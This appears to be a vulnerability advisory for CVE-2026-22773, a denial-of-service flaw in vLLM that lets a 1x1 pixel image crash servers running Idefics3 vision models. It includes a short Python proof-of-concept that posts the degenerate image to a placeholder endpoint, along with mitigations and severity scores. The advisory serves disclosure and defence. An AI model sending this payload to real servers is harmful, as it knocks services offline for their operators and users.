CVE-2026-22773

MEDIUM

vLLM < 0.12.0 - Resource Allocation Without Limits


Description

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.6.4 up to, but not including, 0.12.0, users can crash a vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. The degenerate image triggers a tensor dimension mismatch that surfaces as an unhandled runtime error, terminating the server completely. This issue has been patched in version 0.12.0.
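The crash path is reachable through vLLM's OpenAI-compatible HTTP API, where images arrive as data-URL image_url content parts on /v1/chat/completions. The sketch below illustrates only the shape of the input class described above, not a tested exploit: the server URL, port, and model name are placeholders, and an unpatched vLLM (>= 0.6.4, < 0.12.0) serving an Idefics3-based model is assumed.

    import base64
    import io

    import requests
    from PIL import Image

    # Build a 1x1-pixel PNG in memory -- the degenerate input described above.
    buf = io.BytesIO()
    Image.new("RGB", (1, 1), color=(255, 255, 255)).save(buf, format="PNG")
    image_b64 = base64.b64encode(buf.getvalue()).decode()

    # vLLM's OpenAI-compatible server accepts images as data-URL image_url
    # content parts in chat messages.
    payload = {
        "model": "HuggingFaceM4/Idefics3-8B-Llama3",  # placeholder model name
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                {"type": "image_url",
                 "image_url": {"url": f"data:image/png;base64,{image_b64}"}},
            ],
        }],
    }
    resp = requests.post("http://localhost:8000/v1/chat/completions",  # placeholder host
                         json=payload, timeout=30)
    print(resp.status_code, resp.text[:200])

Until upgrade to 0.12.0 is possible, plausible stopgaps are restricting who can reach the endpoint (the CVSS vector requires PR:L, i.e., an authenticated low-privileged user) and rejecting degenerate image dimensions at a reverse proxy before requests reach the engine.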

Scores

CVSS v3.1 6.5 (Medium)
EPSS 0.0002 (0.02%)
EPSS Percentile 5.8%
Attack Vector NETWORK
Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable no
Technical Impact partial

Details

CWE
CWE-770 (Allocation of Resources Without Limits or Throttling)
Status published
Products (2)
pypi/vllm 0.6.4 - 0.12.0 (PyPI)
vllm/vllm 0.6.4 - 0.12.0
Published Jan 10, 2026
Tracked Since Feb 18, 2026